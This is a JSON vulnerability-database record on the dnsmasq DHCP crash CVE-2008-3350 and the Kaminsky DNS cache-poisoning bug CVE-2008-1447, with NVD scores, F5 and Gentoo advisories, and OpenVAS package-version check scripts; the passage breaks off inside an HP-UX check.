{"cve": [{"lastseen": "2021-02-02T05:35:15", "description": "dnsmasq 2.43 allows remote attackers to cause a denial of service (daemon crash) by (1) sending a DHCPINFORM while lacking a DHCP lease, or (2) attempting to renew a nonexistent DHCP lease for an invalid subnet as an \"unknown client,\" a different vulnerability than CVE-2008-3214.", "edition": 4, "cvss3": {}, "published": "2008-07-28T17:41:00", "title": "CVE-2008-3350", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3350"], "modified": "2017-08-08T01:31:00", "cpe": ["cpe:/a:the_kelleys:dnsmasq:2.43"], "id": "CVE-2008-3350", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3350", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:the_kelleys:dnsmasq:2.43:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:12", "description": "The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka \"DNS Insufficient Socket Entropy Vulnerability\" or \"the Kaminsky bug.\"", "edition": 7, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2008-07-08T23:41:00", "title": "CVE-2008-1447", "type": "cve", "cwe": ["CWE-331"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1447"], "modified": "2020-03-24T18:19:00", "cpe": ["cpe:/a:isc:bind:4", "cpe:/a:isc:bind:9.2.9", "cpe:/a:isc:bind:8"], "id": "CVE-2008-1447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1447", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:isc:bind:4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.2.9:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "edition": 1, "description": "This security advisory describes a BIND 8 and BIND 9 vulnerability which allows remote attackers to spoof DNS traffic using cache poisoning techniques against recursive resolvers. With the exception of FirePass, the F5 products listed as **affected** in this security advisory run a version of BIND that is affected by this vulnerability. Although FirePass does not run the BIND software, its local DNS resolver client is vulnerable to DNS cache poisoning techniques described in CVE-2008-1447 and VU#800113.\n\nInformation about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447>\n\n<http://www.kb.cert.org/vuls/id/800113>\n\nF5 Product Development tracked this issue as CR99135 for BIG-IP LTM, GTM, ASM, WebAccelerator and PSM and it was fixed in versions 9.4.6 and 10.0.0. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, PSM, and WebAccelerator release notes.\n\nThis issue was also fixed in Enterprise Manager version 1.7.0. For information about upgrading, refer to the Enterprise Manager release notes.\n\nF5 Product Development tracked this issue as CR99135 for the BIG-IP LTM 9.6 software branch.\n\nAdditionally, this issue was fixed in hotfix versions BIG-IP-9.3.1-HF4, BIG-IP-9.4.4-HF3, BIG-IP-9.4.5-HF2, and BIG-IP-9.6.1-HF2. You may download these hotfixes or later versions of the hotfixes from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nTo view a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nF5 Product Development tracked this issue as CR102424 and it was fixed in FirePass 6.0.3. For information about upgrading, refer to the [FirePass](<https://support.f5.com/kb/en-us/products/firepass.html>) release notes.\n\nThis issue still exists in the FirePass 5.x branch.\n\n**Obtaining and installing patches**\n\nYou can download patches from the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for the following products and versions:\n\n**Important**: If you installed Hotfix-102424, you must remove Hotfix-102424 before upgrading to FirePass version 6.0.2 or an earlier version of FirePass software. Failure to remove Hotfix-102424 prior to an upgrade may result in the FirePass Administrative Console and logon page becoming inaccessible after the upgrade. You can safely upgrade to FirePass version 6.0.3 after installing Hotfix-102424.\n\nProduct | Version | Hotfix | Installation File \n---|---|---|--- \nFirePass | 6.0.2 | Hotfix-102424 | HF-102424-1-6.02-ALL-0.tar.gz.enc \nFirePass | 6.0.1 | Hotfix-102424 | HF-102424-1-6.01-ALL-0.tar.gz.enc \nFirePass | 5.5.2 | Hotfix-102424 | HF-102424-1-5.52-ALL-0.tar.gz.enc \nFirePass | 5.5.1 | Hotfix-102424 | HF-102424-1-5.51-ALL-0.tar.gz.enc \nFirePass | 5.5.0 | Hotfix-102424 | HF-102424-1-5.5-ALL-0.tar.gz.enc \n \n**Note**: For more information about installing the hotfixes listed above, refer to the readme file on the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for your version-specific hotfix.\n\nFor information about downloading software, refer to SOL167: Downloading software from F5.\n\n**Workaround**\n\nIf you enabled DNS recursion in BIND on an F5 product (excluding FirePass), you can work around this issue by disabling DNS recursion. For information about enabling and disabling DNS recursion in BIND, refer to the BIND documentation at default <http://www.isc.org/products/BIND/>.\n\n**Important**: The BIND vulnerability is only exploitable if recursion has been enabled in BIND. F5 LTM 9.x, GTM 9.x, ASM 9.x, Link Controller 9.x, WebAccelerator 9.x, PSM, Firepass 5.x and 6.x, and Enterprise Manager 1.x products do not enable recursion by default, with the exception of the BIG-IP LTM MSM module configured for **local bind**.\n\nTo minimize the risk for FirePass platforms, configure FirePass to use a local, secure name server for DNS resolution. Additionally, implement anti-spoofing mechanisms on your DNS servers and/or network firewalls.\n\n**Note**: You can configure the name servers in the FirePass Administrative Console on the Device Management > Configuration > Network Configuration page under the **DNS** tab.\n", "modified": "2013-03-19T00:00:00", "published": "2008-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/900/sol8938.html", "id": "SOL8938", "type": "f5", "title": "SOL8938 - BIND DNS cache poisoning vulnerability - CVE-2008-1447 - VU#800113", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:04", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447", "CVE-2008-3350"], "description": "### Background\n\nDnsmasq is a lightweight and easily-configurable DNS forwarder and DHCP server. \n\n### Description\n\n * Dan Kaminsky of IOActive reported that dnsmasq does not randomize UDP source ports when forwarding DNS queries to a recursing DNS server (CVE-2008-1447). \n * Carlos Carvalho reported that dnsmasq in the 2.43 version does not properly handle clients sending inform or renewal queries for unknown DHCP leases, leading to a crash (CVE-2008-3350). \n\n### Impact\n\nA remote attacker could send spoofed DNS response traffic to dnsmasq, possibly involving generating queries via multiple vectors, and spoof DNS replies, which could e.g. lead to the redirection of web or mail traffic to malicious sites. Furthermore, an attacker could generate invalid DHCP traffic and cause a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll dnsmasq users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/dnsmasq-2.45\"", "edition": 1, "modified": "2008-09-04T00:00:00", "published": "2008-09-04T00:00:00", "id": "GLSA-200809-02", "href": "https://security.gentoo.org/glsa/200809-02", "type": "gentoo", "title": "dnsmasq: Denial of Service and DNS spoofing", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447", "CVE-2008-3350"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200809-02.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:61597", "href": "http://plugins.openvas.org/nasl.php?oid=61597", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200809-02 (dnsmasq)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities in dnsmasq might allow for a Denial of Service or\nspoofing of DNS replies.\";\ntag_solution = \"All dnsmasq users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-dns/dnsmasq-2.45'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200809-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=231282\nhttp://bugs.gentoo.org/show_bug.cgi?id=232523\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200809-02.\";\n\n \n\nif(description)\n{\n script_id(61597);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2008-3350\", \"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200809-02 (dnsmasq)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-dns/dnsmasq\", unaffected: make_list(\"ge 2.45\"), vulnerable: make_list(\"lt 2.45\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update to dnsmasq\nannounced via advisory FEDORA-2009-1069.", "modified": "2017-07-10T00:00:00", "published": "2009-02-18T00:00:00", "id": "OPENVAS:63406", "href": "http://plugins.openvas.org/nasl.php?oid=63406", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-1069 (dnsmasq)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_1069.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-1069 (dnsmasq)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to newer upstream version - 2.45.\nVersion of dnsmasq previously shipped in Fedora 9 did not\nproperly drop privileges, causing it to run as root\ninstead of intended user nobody. Issue was caused by a\nbug in kernel-headers used in build environment of the original\npackages. (#454415)\n\nNew upstream version also adds DNS query source port\nrandomization, mitigating DNS spoofing attacks. (CVE-2008-1447)\n\nChangeLog:\n\n* Mon Jul 21 2008 Patrick Jima Laughton 2.45-1\n- Upstream release (bugfixes)\n* Wed Jul 16 2008 Patrick Jima Laughton 2.43-2\n- New upstream release, contains fixes for CVE-2008-1447/CERT VU#800113\n- Dropped patch for newer glibc (merged upstream)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update dnsmasq' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-1069\";\ntag_summary = \"The remote host is missing an update to dnsmasq\nannounced via advisory FEDORA-2009-1069.\";\n\n\n\nif(description)\n{\n script_id(63406);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-18 23:13:28 +0100 (Wed, 18 Feb 2009)\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Core 9 FEDORA-2009-1069 (dnsmasq)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=449345\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.45~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dnsmasq-debuginfo\", rpm:\"dnsmasq-debuginfo~2.45~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see the referenced link). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104095", "type": "openvas", "title": "Nmap NSE net: dns-random-txid", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script:\n# Script: Brandon Enright <bmenrigh@ucsd.edu>\n# txidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104095\");\n script_version(\"2020-07-07T13:54:18+0000\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"2020-07-07 13:54:18 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE net: dns-random-txid\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_xref(name:\"URL\", value:\"https://www.dns-oarc.net/oarc/services/txidtest\");\n\n script_tag(name:\"summary\", value:\"Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see the referenced link). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:51:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-191-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:61464", "href": "http://plugins.openvas.org/nasl.php?oid=61464", "type": "openvas", "title": "Slackware Advisory SSA:2008-191-02 bind", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_191_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\nhttp://www.isc.org/sw/bind/bind-security.php\nhttp://www.kb.cert.org/vuls/id/800113\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2008-191-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-191-02\";\n \nif(description)\n{\n script_id(61464);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2008-191-02 bind \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.4.2_P1-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.4.2_P1-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:56:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of BIND", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835164", "href": "http://plugins.openvas.org/nasl.php?oid=835164", "type": "openvas", "title": "HP-UX Update for BIND HPSBUX02351", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND HPSBUX02351\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote DNS cache poisoning\";\ntag_affected = \"BIND on\n HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.3.2 or BIND v9.2.0, HP-UX \n B.11.11 running BIND v8.1.2\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n BIND. The vulnerability could be exploited remotely to cause DNS cache \n poisoning.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01506861-6\");\n script_id(835164);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"HPSBUX\", value: \"02351\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"HP-UX Update for BIND HPSBUX02351\");\n\n script_summary(\"Check for the Version of BIND\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"NameService.BIND-AUX\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"NameService.BIND-RUN\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND-UPGRADE\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND2-UPGRADE\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-INETD\", patch_list:['PHNE_37865'], 